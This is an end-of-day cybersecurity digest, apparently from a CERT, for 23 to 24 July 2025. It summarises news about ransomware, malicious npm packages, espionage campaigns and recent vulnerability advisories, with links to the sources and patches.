End-of-Day report
Timeframe: Mittwoch 23-07-2025 18:00 - Donnerstag 24-07-2025 18:00
Handler: Guenes Holler
Co-Handler: Felician Fuchs
News
Microsoft: SharePoint servers also targeted in ransomware attacks
A China-based hacking group is deploying Warlock ransomware on Microsoft SharePoint servers vulnerable to widespread attacks targeting the recently patched ToolShell zero-day exploit chain.
https://www.bleepingcomputer.com/news/security/microsoft-sharepoint-servers-also-targeted-in-ransomware-attacks/
Hackers breach Toptal GitHub account, publish malicious npm packages
Hackers compromised Toptal's GitHub organization account and used their access to publish ten malicious packages on the Node Package Manager (NPM) index. The packages included data-stealing code that collected GitHub authentication tokens and then wiped the victims' systems.
https://www.bleepingcomputer.com/news/security/hackers-breach-toptal-github-account-publish-malicious-npm-packages/
Threat Actor Mimo Targets Magento and Docker to Deploy Crypto Miners and Proxyware
The threat actor behind the exploitation of vulnerable Craft Content Management System (CMS) instances has shifted its tactics to target Magento CMS and misconfigured Docker instances. The activity has been attributed to a threat actor tracked as Mimo (aka Hezb), which has a long history of leveraging N-day security flaws in various web applications to deploy cryptocurrency miners.
https://thehackernews.com/2025/07/threat-actor-mimo-targets-magento-and.html
Hackers Deploy Stealth Backdoor in WordPress Mu-Plugins to Maintain Admin Access
Cybersecurity researchers have uncovered a new stealthy backdoor concealed within the "mu-plugins" directory in WordPress sites to grant threat actors persistent access and allow them to perform arbitrary actions.
https://thehackernews.com/2025/07/hackers-deploy-stealth-backdoor-in.html
China-Based APTs Deploy Fake Dalai Lama Apps to Spy on Tibetan Community
The Tibetan community has been targeted by a China-nexus cyber espionage group as part of two campaigns conducted last month ahead of the Dalai Lama's 90th birthday on July 6, 2025. The multi-stage attacks have been codenamed Operation GhostChat and Operation PhantomPrayers by Zscaler ThreatLabz.
https://thehackernews.com/2025/07/china-based-apts-deploy-fake-dalai-lama.html
Stealthy cyber spies linked to China compromising virtualization software globally
A cyber-espionage campaign linked to a sophisticated hacking group believed to be based in China is continuing to compromise virtualization and networking infrastructure used by enterprises globally, according to a new deep-dive report by cybersecurity company Sygnia.
https://therecord.media/stealthy-china-spies-fire-ant-virtualization-software
Unmasking the new Chaos RaaS group attacks
Cisco Talos Incident Response (Talos IR) recently observed attacks by Chaos, a relatively new ransomware-as-a-service (RaaS) group conducting big-game hunting and double extortion attacks.
https://blog.talosintelligence.com/new-chaos-ransomware/
Comeback von Lumma und NoName057(16): Cybercrime-Zerschlagung misslungen
Gelingt Strafverfolgungsbehörden ein größerer Schlag gegen Akteure und Infrastrukturen des Cybercrime, so ist der Rückgang der verbrecherischen Aktivitäten selten von Dauer: Nach ein paar internen Umbauten setzen sie ihre Angriffe häufig fort, als sei (fast) nichts geschehen.
https://heise.de/-10498191
Mitel warns of critical MiVoice MX-ONE authentication bypass flaw
Mitel Networks has released security updates to patch a critical-severity authentication bypass vulnerability impacting its MiVoice MX-ONE enterprise communications platform.
https://www.bleepingcomputer.com/news/security/mitel-warns-of-critical-mivoice-mx-one-authentication-bypass-flaw/
Vulnerabilities
SonicWall urges admins to patch critical RCE flaw in SMA 100 devices
SonicWall urges customers to patch SMA 100 series appliances against a critical authenticated arbitrary file upload vulnerability that can let attackers gain remote code execution. The security flaw (tracked as CVE-2025-40599) is caused by an unrestricted file upload weakness in the devices' web management interfaces, which can allow remote threat actors with administrative privileges to upload arbitrary files to the system.
https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-critical-rce-flaw-in-sma-100-VPN-appliances/
Security updates for Thursday
Security updates have been issued by Debian (chromium, firefox-esr, and mediawiki), Fedora (firefox), Oracle (git, kernel, redis, and sudo), Red Hat (aardvark-dns, firefox, kernel, and thunderbird), Slackware (httpd), SUSE (php7, php8, and salt), and Ubuntu (linux-raspi-realtime and ruby-rack).
https://lwn.net/Articles/1031274/
K000152680: BusyBox vulnerability CVE-2024-58251
Attackers can launch network applications as local users leading to a denial-of-service (DoS). As attackers require local access to run netstat commands, the attack is limited to only the netstat command.
https://my.f5.com/manage/s/article/K000152680
K000152678: BusyBox vulnerability CVE-2025-46394
An attacker could exploit this vulnerability by creating a TAR archive containing malicious files with names manipulated by escape sequences. When a user lists or extracts the contents of the archives, these malicious files might not be visible in the standard terminal output and may overwrite existing files.
https://my.f5.com/manage/s/article/K000152678
DSA-5964-1 firefox-esr - security update
https://lists.debian.org/debian-security-announce/2025/msg00128.html
DSA-5965-1 chromium - security update
https://lists.debian.org/debian-security-announce/2025/msg00129.html
CVE-2025-6983 - TP-Link Archer C1200 vulnerable to clickjacking
https://jvn.jp/en/jp/JVN39913189/
CVE-2025-8092 - COOKiES Consent Management - Moderately critical - Cross-site Scripting
https://www.drupal.org/sa-contrib-2025-092
CVE-2025-7745 - 2025-07-24: Cyber Security Advisory -AC500 V2 Buffer overread on Modbus protocol
https://search.abb.com/library/Download.aspx?DocumentID=3ADR011432&LanguageCode=en&DocumentPartId=&Action=Launch
CVE-2025-8069 - AWS Client VPN Windows Client Local Privilege Escalation
https://aws.amazon.com/de/security/security-bulletins/AWS-2025-014/
CVE-2024-58256 - Security Advisory - OS Command Injection Vulnerability in Huawei EnzoH Products
http:www.huawei.com/en/psirt/security-advisories/2025/huawei-sa-OCIViHEP-en.html
[R1] Tenable Identity Exposure Version 3.77.12 Fixes Multiple Vulnerabilities
https://www.tenable.com/security/tns-2025-14